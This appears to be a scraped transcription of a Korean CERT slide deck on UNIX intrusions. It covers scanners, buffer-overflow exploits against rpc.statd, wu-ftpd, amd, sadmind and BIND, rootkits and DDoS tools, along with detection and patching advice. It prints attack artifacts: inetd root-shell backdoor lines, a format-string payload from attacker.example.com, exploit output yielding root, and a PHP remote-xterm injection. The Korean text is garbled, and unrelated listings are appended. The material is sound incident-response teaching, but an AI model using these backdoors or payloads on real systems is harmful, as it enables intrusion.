ๆญฏํ•˜๋„์œคUNIX.PDF

Size: px
Start display at page:

Download "ๆญฏํ•˜๋„์œคUNIX.PDF"

Transcription

1

2

3 & Automated scan & attack / Internet Worm Ramen ADMWorm Millenium Internet Worm etc.

4 & multiple scan mscan, sscan, nmap,vetescan, sscanew,... Intruder Master Master Master / D D D D D D D D DDOS Trinoo, TFN, TFN2K, Stacheldraht, mstream,... Randomized ports Victim

5 (?) Windows Trojan BackOrifice, NetBus, Sub7, School Bus,DeepBO,...

6 Hackvisit

7 (Browers) Trojan(BO) GUI Trojan Horse (NNTP) DNS

8 1/2 <1 >,, <2 > ftpd, amountd, imap guest, anonymous,, ID <3 >root root root <4 > (Sniffer) ID,

9 2/2 <5 > (Backdoor), /etc/inetd.conf root login Trojaned telnet *KAIST <6 >,,,, <7 > < >

10 Types of Scan mscan SAINT, sscan2k, vetescan, Cgican, winscan, rpcscan : nmap, stealthscan : firewalk, nmap

11 network cert# nmap -sp *" Starting nmap V. 2.3BETA6 by Fyodor Host ( ) appears to be up. Host XXXXX.certcc.or.kr ( xxx) appears to be up. Host XXXXX.certcc.or.kr ( XXX) appears to be up. ( ) Host XXXXX.certcc.or.kr ( xxx) appears to be up. Host ( ) appears to be up. Host ( ) seems to be a subnet broadcast address (returned 26 extra pings). Skipping host. Nmap run completed IP addresses (27 hosts up) scanned in 14 seconds cert#

12 - nmap cert# nmap -I -O XXX Starting nmap V. 2.3BETA6 by Fyodor Interesting ports on XXX.certcc.or.kr ( XXX): Port State Protocol Service Owner 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 80 open tcp http 110 open tcp pop open tcp sunrpc 512 open tcp exec 1998 open tcp x25-svc-port 4045 open tcp lockd 6000 open tcp X open tcp dtspc 7100 open tcp font-service TCP Sequence Prediction: Class=random positive increments Difficulty=28995 (Worthy challenge) Remote operating system guess: Solaris Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds

13 - sscan2k sscan2k-pre6]#./sscan -o <[ * report for host violet93 * <[ tcp port: 111 (unknown) ]> <[ tcp port: 6000 (unknown) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> <[ tcp port: 113 (auth) ]> --<[ *OS*: violet93: NMAP detected: Linux <[ *Named* Running: REL --<[ *BANNER*: Mail banner follows: 220 localhost.localdomain ESMTP Sendmail /8.11.0; Wed, 7 Feb :05: <[ * rpc services? * ]>-- <[ [prog. name -> portmapper] [port -> 111(udp)] [vers. -> 2] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 1] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 3] <[ [prog. name -> status] [port -> 1057(udp)] [vers. -> 1] <[ [prog. name -> status] [port -> 3196(tcp)] [vers. -> 1] --<[ * exports...? * ]>-- --<[ *VULN REPORT SUMMARY: violet93 --<[ *VULN*: violet93: sendmail will 'expn' accounts for us@? <[ * scan of violet93 completed

14 - vetescan vetes]#./vetescan [VetesCan]: checking for all the bitches arguments.. right on [VetesCan]: setting local script variables.. done. [VetesCan]: using nmap to detect running tcp services.. done. [VetesCan]: Lets see what OS the bitch has.. done. Done... [VetesCan]: checking for Vulnerable Services.. [VetesCan]: checking for Systat.. [VetesCan]: checking for Netstat.. [VetesCan]: checking for Authentication.. [VetesCan]: checking for ftpd.. [VetesCan]: checking for MDBMS.. [VetesCan]: checking for TCP/36864 portshell.. [VetesCan]: checking for gnapster.. [VetesCan]: checking for gdm.. [VetesCan]: checking for exec.. [VetesCan]: checking for D-Link Admin Login.. [VetesCan]: checking for Smb =-=-=-=-=-=-=-=-=V=e=t=e=S=c=a=n=-=-=-=-=-=-=-=-=-=-= Running services on : Starting nmap V. 2.3BETA15 by ( ) Interesting ports on violet93 ( ): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 53 open tcp domain 111 open tcp sunrpc 113 open tcp auth 515 open tcp printer 6000 open tcp X11 TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) Remote operating system guess: Linux Checking for Ftpd: [ver (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.] Vulnerable Ftpds: docs/ftp/vuln-ftp-versions.txt checking for RPC/Statd: statd Patch: ftp://sgigate.sgi.com/patches/ Exploit: docs/statd

15 [ ] Login Name TTY Idle When Where root Super-User console 3:20 Tue 10:30 :0 chief Ha do yoon pts/5 5:38 Wed 13: cert# rpcinfo -p xxx program vers proto port tcp 111 rpcbind udp 111 rpcbind ( ) udp 1026 nlockmgr udp 1026 nlockmgr tcp 1024 nlockmgr tcp 1024 nlockmgr tcp 878 amd udp 879 amd

16 root local attack : easy remote attack : not easy rpc.statd ftpd amd sadmin named

17 Buffer Overflow copy stack return address root

18 0xbfffffb 0xbfffffb 0xbfffffb Botton of stack env.vars parameters Botton of stack env.vars parameters Botton of stack env.vars parameters stack grown buffer grown Return addr Prev.frame ptr Stack vars Stack frame 0 Return addr Prev.frame ptr Stack vars Expected location of the return addr Return addr Prev.frame ptr Stack vars frame pointer stack pointer. parameters Return addr Prev.frame ptr Buffer[96] Stack frame for main() frame pointer stack pointer. addr of the attack code Attack code Attack code Buffer overflow stack pointer Instruction pointer stack address space stack address space stack address space. addr of the attack code Attack code Attack code void void main() main() { { char char buffer[96]; Instruction buffer[96];.. pointer.. Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } Instruction pointer void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } executed code segment executed code segment executed code segment (a) before the attack (b) after injecting the attack code (c) execting the attack code

19 Buffer Overflow SUID

20 rpc.statd bug 1. syslog() string input ---> root - rpc.statd UNIX /etc/inetd.conf shell NFS rpc.statd - CERTCC-KR KA

21 FTPD bug 1. "Site exec" Vulnerability - wu-ftpd ftpd 2. setproctitle() Vulnerability - wu-ftpd 2.6.0, proftpd, OpenBSD (solaris ) Jul 4 17:43:25 victim ftpd[3408]: USER ftp Jul 4 17:43:25 victim ftpd[3408]: PASS [malicious shellcode] Jul 4 17:43:26 victim ftpd[3408]: ANONYMOUS FTP LOGIN FROM attacker.example.com [ ], [malicious shellcode] Jul 4 17:43:28 victim-site ftpd[3408]: SITE EXEC (lines: 0): %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f %p Jul 4 17:43:28 victim ftpd[3408]: FTP session closed 3.

22 Linux amd Buffer Overflow amd - - am-utils amd - RedHat 6.x - - RedHat 6.x - amd

23 Linux amd Buffer Overflow [/tmp]# grep amd /var/log/messages messages.1:mar 11 05:20:50 xxx 27>Mar 11 05:20:50 amd[468]: amq requested mount of ^N 3 F^L ^W ^Z?K? 18 Jan str/bin/sh(-c)/bin/echo '2222? stream tcp nowait root /bin/sh s (^ [/tmp]# ls -l -rw-rw-rw- 1 root root 116 Mar 11 05:20 h [/tmp]# more h 2222 stream tcp nowait root /bin/sh sh -i

24 Linux amd Buffer Overflow [/tmp]# ps aux grep inetd root ? S Jan12 0:00 inetd root ? S Mar11 0:00 inetd -s /tmp/h [root@alzza6 ~]# netstat -a grep 2222 tcp 0 0 *:2222 *:* LISTEN

25 Linux amd Buffer Overflow $ telnet xxx.xxx.xxx.xxx 2222 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. bash# id id uid=0(root) gid=0(root) groups=0(root) bash#

26 Linux amd Buffer Overflow - 1- Intel: ftp://updates.redhat.com/6.0/i386/am-utils-6.0.1s i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/am-utils-6.0.1s alpha.rpm SPARC: ftp://updates.redhat.com/6.0/sparc/am-utils-6.0.1s sparc.rpm Source: ftp://updates.redhat.com/6.0/srpms/am-utils-6.0.1s src.rpm Architecture neutral: ftp://updates.redhat.com/6.0/noarch/ # rpm -Uvh " # /etc/rc.d/init.d/amd restart

27 Linux amd Buffer Overflow - 2- amd # ps ax grep amd 444? S 0:00 /usr/sbin/amd -a /.automount -l syslog -c 1000 /net # killall -9 amd

28 Linux amd Buffer Overflow - 2- amd run level # chkconfig --list amd amd 0:off 1:off 2:off 3:on 4:on 5:on 6:off # chkconfig --level amd off # chkconfig --list amd amd 0:off 1:off 2:off 3:off 4:off 5:off 6:off

29 sadmind Buffer Overflow Sadmind - Solaris :Sun Solstice Adminsuite - Solaris 2.5, 2.6, 2.7 /usr/sbin - remote - request, inetd daemon

30 sadmind Buffer Overflow Sadmind - sadmind stack - sadmind root - remote root - offset ~

31 sadmind Buffer Overflow cert# sadmindex -h s [offset] %sp 0xefff9580 offset > return address 0xefff9838 [4] %sp 0xefff9580 with frame length > %fp 0xefffa850 clnt_call: RPC: Timed out now check if exploit worked; RPC failure was expected cert# telnet Trying Connected to Escape character is '^]'. # id; uid=0(root) gid=0(root)

32 sadmind Buffer Overflow ( ) # ls -al /tmp/bob -rw-rw-rw- 1 root root 48 Jun 7 15:34 /tmp/bob # cat /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i # ps -ef. root :19:07? 0:00 /usr/sbin/inetd -s /tmp/bob. # netstat -a Local Address Remote Address Swind Send-Q Rwind Recv-Q State *.ingreslock *.* LISTEN

33 sadmind Buffer Overflow /var/adm/messages Apr 12 06:43:34 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:36 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:39 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:41 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:44 xxxx inetd[138]: /usr/sbin/sadmind: Hangup

34 sadmind Buffer Overflow /etc/inetd.conf, ( # ) /10 tli rpc/udp wait root /usr/sbin/sadmind sadmind sadmind ( : /opt/sunwadm/bin/admuseradd ) /10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2

35 sadmind Buffer Overflow - OS Version Patch ID SunOS SunOS 5.7_x SunOS SunOS 5.6_x SunOS SunOS 5.5.1_x SunOS SunOS 5.5_x AdminSuite Version Patch ID (see Note) 2.3_x (see Note)

36 DNS : named, : resolver TCP, UDP port 53 port - DNS

37 DNS - - Inverse Query - inverse query request - root - BIND 8(/etc/named.conf ) fake-iquery no; - BIND 4.9(/etc/named.boot ) options fake-iquery, conf/options.h INVQ

38 DNS - - Inverse Query /var/named/admrocks empty /etc/inetd.conf 2222 port back door 2222 stream tcp nowait root /bin/sh sh -i

39 NXT NXT Regular Record DNS - - owner name zone name zone signed

40 NXT DNS BIND 8.2, 8.2 p1, NXT validate - NXT - buffer overflow code - named - BIND BIND 4.x

41 NXT DNS - - ADM named 8.2/8.2.1 NXT remote overflow exploit 1999 exploit root /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob /var/named/admrocks empty directory / var/named/o

42 DNS DNS off /etc/rc.d/init.d/named stop chmod -x /etc/rc.d/init.d/named bind - bind 4.9.7, p5 - : Solaris 7 Solaris 7 (SPARC) Solaris 7 (Intel) RedHat Linux 6.x ( )

43 Back door / backdoor 1. bindshell - daemon shell 2. inetd - trojan remote access 3. tcpd - hide connection, avoid deny 4. Rshd - trojan remote access 5. chfn, chsh - user root 6. crontab - cron 7. du - hide file size 8. find - hide file 9. ls - hide file 10. ifconfig - hide sniffing (hide promiscuous mode interface)

44 Back door / backdoor 11. killall - kill 12. sniffer - packet sniffer 13. sniffchk - sniffer 14. login - trojan remote access 15. netstat - hide connection, hide listening port 16. passwd - user root 17. pidof - hide process (linux) 18. ps - sniffer, backdoor daemon 19. wted - wtmp / utmp 20. syslogd - hide log 21. top - sniffer, backdoor daemon

45 Back door bindshell /08/12 3.2/4.3NFSSRC # Internet server configuration database ftp stream tcp nowait root /usr/etc/ftpd ftpd telnet stream tcp nowait root /usr/etc/telnetd telnetd shell stream tcp nowait root /usr/etc/rshd rshd 2222 stream tcp nowait root /bin/sh sh -i

46 shell backdoor scan scanning 3. tcp 1524, 2222, 9704 scan scanner#./synscan infile outfile eth ,2222,9704 SynScan 1.6 by psychoid/tcl scanner# cat outfile 203.*** (203.*** ):1524 :# 202.*** (202.***.78.98):1524 :bash# 202.*** (202.***.13.81):2222 :bash# cf PC outfile.

47 Rootkit,, backdoor Rootkit /dev. (ls ls ). (ex. /usr/src/linux/arch/alpha/lib) find /dev -type f -print

48 Rootkit rootkit lrk 4,5 warchild rootkit (solaris, linux),knork Rootkit. (ex. ac.kr scanning) scanning Denial of service..

49 Sniffing ID telnet, pop, www ID esniff, solsniff, linsniff, sniffit, tcpdump, snoop, WWW Sniff

50 Sniffing promiscuous mode : sniffing. :CPM, neped Secure Shell (SSH), VPN tcp session.

51

52 Event Attack Incident : Hackers, Spies, Terrorists, Corporate raider, Professional Criminals, Vandals, Voyeurs : Physical Attack, Information Exchange, User command, Script/Program, Autonomous agent, Toolkit, Distributed tool, Data trap : Design, Implementation, Configuration : Probe, Scan, Flood, Authenticate, Bypass, Spoof, Read, Copy, Steal, Modify, Delete : Account, Process, Data, Component, Computer, Network, Internet work : Increased Access, Disclosure of Information, Corruption of Information, Denial of Service, Theft of Resources : Challenge Status/Thrill, Political Gain, Financial Gain, Damage

53 (Denial Of Service) TCP DOS DOS

54 Distributed DOS Attack Trin00 Attack 27665/tcp Intruder M-> D : 27444/udp D->M : 31335/udp Master Master Master D D D D D D D D Randomized ports Victim

55 Trin00 Attack Communication Network Master Daemon Agent Daemon Hello telnet xxx.xxx.xxx. xxx password trinoo > Trinoo > attack IP- Addr password attack IP- addr Broadcast PONG Attack (UDP Flooding)

56 Stacheldraht Attack Communication Network 65000/tcp or ICMP ECHO_REPLY ICMP ECHO_REPLY agent 16660/tcp ( ) master TCP SYN, UDP flood ICMP flood, Smurf Internet Attacker master handler client

57 Distributed DOS Attack Trin00 ( ) : Trin00 rpc./trin.sh nc xxx.xxx.xxx.xxx 1524 WORM trin00

58 Distributed DOS Attack Trin00 trin00 master Deamon # nmap -PI -st -p m 2766.log xxx.xxx.xxx # nmap -PI -su -p m log xxx.xxx.xxx # nmap -PI -su -p m log xxx.xxx.xxx rpc # nmap -PI -st -p m 1524.log xxx.xxx.xxx ) Host: xxx.xxx.xxx.21 () Status: Up Host: xxx.xxx.xxx.22 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.28 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.29 () Ports: 31335/open/udp/////

59 Distributed DOS Attack Trin00 : trin00 : tserver1900, deamon : tsolnmb, ns, httpd, rpc.trinoo, rpc.listen, trinix, rpc.irix, irix cron table * * * * /dev/isdn/.subsys/tsolnmb > /dev/null 2>&1 netstat *:31335 Idle (UDP) *:27444 Idle (UDP) *:27665 *:*... Listen (TCP)

60 Distributed DOS Attack Trin00 Secure Your Host 31335(UDP), 27444(UDP), 27665(TCP) DOS Trin00 National Infrastructure Protection Center Trin00 CERTCC-KR,

61 Distributed DOS Attack Trin00 daemon strings master master CERTCC-KR daemon binary master master daemon IP CERTCC-KR CERTCC-KR daemon host trin00 CERTCC-KR

62 Distributed DOS Attack Trin00 CERTCC-KR Trin00 ISP Trin00? Trin00 /

63 PHP 1. / php <? system( "/usr/bin/x11/xterm -display < IP>:0.0" );?> 4. PHP CGI.php.php3.cgi SSI( Server Side Interpreter ) --> nobody

64 PHP 5. - PHP, - -,.php.php3 cgi - CERTCC-KR KA

65 - -

66 - -

67 - -

68 - - /usr/sbin/pwconv, pwunconv crack passwd+, npasswd, anlpasswd -n : -x : -w : /etc/default/passwd PASSLENGTH

69 - - Linux Red Hat : SUNOS : show.pl?target=patches/patch-access HPUX : IBM AIX : ftp://aix.software.ibm.com/aix/efixes/security/ NOVELL : ftp://ftp.novell.com SCO : ftp://ftp.sco.com SGI : ftp://ftp.sgi.com/security/sgi

70 - - UNIX Utmp Acces s_log mess ages News log Su log Secur e log wtmp SPAM relay Popd O O Spool er log Sys log Imapd O O Named O Innd O O Identd O Phf CGI O Portscan Mscan O O O su O O login O O O O ftp O O O O O

71 Q & A

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜ (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

More information

2-11ร€รฅ

2-11ร€รฅ Chapter 11 script kiddies.... 24.., script kiddies..,... 215 1 TCP/IP., TCP/IP. IP IP..,. IP. TCP/IP TCP( UDP).. 0 65535.., IP, IP,,. (, ). 216 Chapter 11 IP. IP.... 1024 (0 1023 ).... A B. B IP, A. IP,

More information

*****

***** Korea Internet & Security Agency 21 2 ๋ณธ ๋ณด๊ณ ์„œ ๋‚ด์šฉ์˜ ์ „๋ถ€๋‚˜ ์ผ๋ถ€๋ฅผ ์ธ์šฉํ•˜๋Š” ๊ฒฝ์šฐ์—๋Š” ๋ฐ˜๋“œ์‹œ ์ถœ์ฒ˜ [์ž๋ฃŒ:ํ•œ๊ตญ์ธํ„ฐ๋„ท์ง„ํฅ์› ์ธํ„ฐ๋„ท์นจํ•ด๋Œ€์‘์„ผํ„ฐ]๋ฅผ ๋ช…์‹œํ•˜์—ฌ ์ฃผ์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 ๊ฐ€์ƒ๋Œ€ํ•™ ์‹œ์Šคํ…œ์˜ ๊ตญ๋‚ด์™ธ ํ˜„ํ™ฉ ์กฐ์‚ฌ ๊ฐ€์ƒ๋Œ€ํ•™ ํ”Œ๋žซํผ ๊ฐœ๋ฐœ ์ด์ƒ์ ์ธ ๊ฐ€์ƒ๋Œ€ํ•™์‹œ์Šคํ…œ์˜ ๋ฏธ๋ž˜์ƒ ์ œ์•ˆ 5 ์›น-๊ธฐ๋ฐ˜ ๊ฐ€์ƒ๋Œ€ํ•™ ์‹œ์Šคํ…œ ์ „ํ†ต์ ์ธ ๊ต์ˆ˜ ๋ฐฉ๋ฒ• ์‹œ๊ฐ„/๊ณต๊ฐ„ ์ œ์•ฝ์„ ๊ทน๋ณตํ•œ ํ•™์Šต๋™๊ธฐ ๋ถ€์—ฌ ๊ต์ˆ˜์˜ ์ผ๋ฐฉ์ ์ธ ๋‚ด์šฉ์ „๋‹ฌ ๊ต์ˆ˜์™€ ํ•™์ƒ๊ฐ„์˜ ์ƒํ˜ธ์ž‘์šฉ ๋™๋ฃŒ ํ•™์ƒ๋“ค ๊ฐ„์˜ ์ƒํ˜ธ์ž‘์šฉ ๊ฐ€์ƒ๋Œ€ํ•™ ์šด์˜ ๊ณต์ง€์‚ฌํ•ญ,๊ฐ•์˜๋ก ์ž๋ฃŒ์‹ค, ๋ฉ”๋ชจ ์งˆ์˜์‘๋‹ต,

More information

ร€รŽร…รยณร รรธรˆรฏยฟรธ 3ยฟรน ร€รบร‡ร˜ยปรณ

ร€รŽร…รยณร รรธรˆรฏยฟรธ 3ยฟรน ร€รบร‡ร˜ยปรณ Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%

More information

ร€รŽร…รยณร รรธรˆรฏยฟรธ 5ยฟรน

ร€รŽร…รยณร รรธรˆรฏยฟรธ 5ยฟรน 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

Network seminar.key

Network seminar.key Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network

More information

UDP Flooding Attack ๊ณต๊ฒฉ๊ณผ ๋ฐฉ์–ด

UDP Flooding Attack ๊ณต๊ฒฉ๊ณผ ๋ฐฉ์–ด ํ™ฉ ๊ต ๊ตญ (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. ์†Œ๊ฐœ...3 2. ๊ณต๊ฒฉ ๊ด€๋ จ Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5

More information

*

* Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46

More information

Subnet Address Internet Network G Network Network class B networ

Subnet Address Internet Network G Network Network class B networ Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,

More information

แ„Œแ…ฆ20แ„’แ…ฌ_แ„’แ…ขแ„แ…ตแ†ผแ„‡แ…กแ†ผแ„Œแ…ตแ„‹แ…ฏแ„แ…ณแ„‰แ…ฃแ†ธ_(แ„‹แ…ตแ„Œแ…ขแ„‰แ…ฅแ†จ)

แ„Œแ…ฆ20แ„’แ…ฌ_แ„’แ…ขแ„แ…ตแ†ผแ„‡แ…กแ†ผแ„Œแ…ตแ„‹แ…ฏแ„แ…ณแ„‰แ…ฃแ†ธ_(แ„‹แ…ตแ„Œแ…ขแ„‰แ…ฅแ†จ) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

TCP.IP.ppt

TCP.IP.ppt TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP Internet Protocol _ IP Address Internet Protocol _ Subnet Mask Internet Protocol _ ARP(Address Resolution Protocol) Internet Protocol _ RARP(Reverse Address Resolution

More information

Backup Exec

Backup Exec (sjin.kim@veritas.com) www.veritas veritas.co..co.kr ? 24 X 7 X 365 Global Data Access.. 100% Storage Used Terabytes 9 8 7 6 5 4 3 2 1 0 2000 2001 2002 2003 IDC (TB) 93%. 199693,000 TB 2000831,000 TB.

More information

bn2019_2

bn2019_2 arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily

More information

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜ Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING

More information

6์ฃผ์ฐจ.key

6์ฃผ์ฐจ.key 6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running

More information

LXR ์„ค์น˜ ๋ฐ ์‚ฌ์šฉ๋ฒ•.doc

LXR ์„ค์น˜ ๋ฐ ์‚ฌ์šฉ๋ฒ•.doc Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess

More information

o o o 8.2.1. Host Error 8.2.2. Message Error 8.2.3. Recipient Error 8.2.4. Error 8.2.5. Host 8.5.1. Rule 8.5.2. Error 8.5.3. Retry Rule 8.11.1. Intermittently

More information

๋‹ค. ์ตœ์‹  ๋ฒ„์ „์˜ rpm ํŒจํ‚ค์ง€ ๋ฒ„์ „์„ ๋‹ค์šด๋กœ๋“œํ•ด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค ์น˜ํ•œ๋‹ค. ๋‹จ debuginfo์˜ rpm ํŒจํ‚ค์ง€๋Š” ์„ค์น˜ํ•  ํ•„์š”๊ฐ€ ์—†๋‹ค. ํ•˜๊ธฐ ์œ„ํ•œ ์˜ต์…˜์ด๊ณ , init๋Š” ์ €์žฅ์†Œ๋ฅผ ์ดˆ๊ธฐํ™”ํ•˜๊ธฐ ์œ„ํ•œ cvs ๋ช…๋ น ์–ด์ด๋‹ค. - ์ƒˆ๋กœ ์„ค์น˜ํ•œ ๊ฒฝ์šฐ : rpm -ivh cvs* -

๋‹ค. ์ตœ์‹  ๋ฒ„์ „์˜ rpm ํŒจํ‚ค์ง€ ๋ฒ„์ „์„ ๋‹ค์šด๋กœ๋“œํ•ด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค ์น˜ํ•œ๋‹ค. ๋‹จ debuginfo์˜ rpm ํŒจํ‚ค์ง€๋Š” ์„ค์น˜ํ•  ํ•„์š”๊ฐ€ ์—†๋‹ค. ํ•˜๊ธฐ ์œ„ํ•œ ์˜ต์…˜์ด๊ณ , init๋Š” ์ €์žฅ์†Œ๋ฅผ ์ดˆ๊ธฐํ™”ํ•˜๊ธฐ ์œ„ํ•œ cvs ๋ช…๋ น ์–ด์ด๋‹ค. - ์ƒˆ๋กœ ์„ค์น˜ํ•œ ๊ฒฝ์šฐ : rpm -ivh cvs* - ๊ฐœ๋ฐœ์ž๋ฅผ ์œ„ํ•œ ๋ฆฌ๋ˆ…์Šค ์œ ํ‹ธ๋ฆฌํ‹ฐ ํ™œ์šฉ๋ฒ• CVS๋ฅผ ์ด์šฉํ•œ ํ”„๋กœ์ ํŠธ ๊ด€๋ฆฌ ์—ฐ์žฌ์˜ ๋งˆ์ง€๋ง‰ ์‹œ๊ฐ„์—๋Š” ๋ฆฌ๋ˆ…์Šค์˜ ์†Œ์Šค ๋ฒ„์ „ ๊ด€๋ฆฌ๋ฅผ ์œ„ํ•œ ํˆด์„ ์†Œ๊ฐœํ•œ๋‹ค. ์ด ํˆด์€ ํ”ํžˆ ํ˜•์ƒ ๊ด€๋ฆฌ ์‹œ์Šคํ…œ, ๋ฒ„์ „ ๊ด€๋ฆฌ ์‹œ์Šคํ…œ์ด๋ผ๊ณ  ์ผ์ปฌ์–ด์ง„๋‹ค. ์œˆ๋„์šฐ๋‚˜ ๋ฆฌ๋ˆ…์Šค ์‹œ์Šคํ…œ ํ™˜๊ฒฝ์—๋Š” ์—ฌ๋Ÿฌ ๊ฐ€์ง€ ํ˜•์ƒ ๊ด€ ๋ฆฌ ์‹œ์Šคํ…œ์ด ์กด์žฌํ•˜๋Š”๋ฐ ์—ฌ๊ธฐ์„œ๋Š” ํ˜„์žฌ ์˜คํ”ˆ์†Œ์Šค๋กœ ๋„๋ฆฌ ์•Œ๋ ค์ง„ CVS์— ๋Œ€ํ•ด ์‚ดํŽด๋ณธ๋‹ค. 4 ์—ฐ ์žฌ ์ˆœ

More information

์นจ์ž…๋ฐฉ์ง€์†”๋ฃจ์…˜๋„์ž…๊ฒ€ํ† ๋ณด๊ณ ์„œ

์นจ์ž…๋ฐฉ์ง€์†”๋ฃจ์…˜๋„์ž…๊ฒ€ํ† ๋ณด๊ณ ์„œ IT 2005. 06. 02. IT IT Windows 3503 4463 4178 64% Solaris 142 56 36 Digital UX 37 24 9 Tru64 30 20 26 Server & DeskTop UNIX HP-UX 27 IRIX 19 FreeBSD 12 7 15 8 5 17 9 2% AIX 5 3 3 Linux 348 400 516 8% Apple

More information

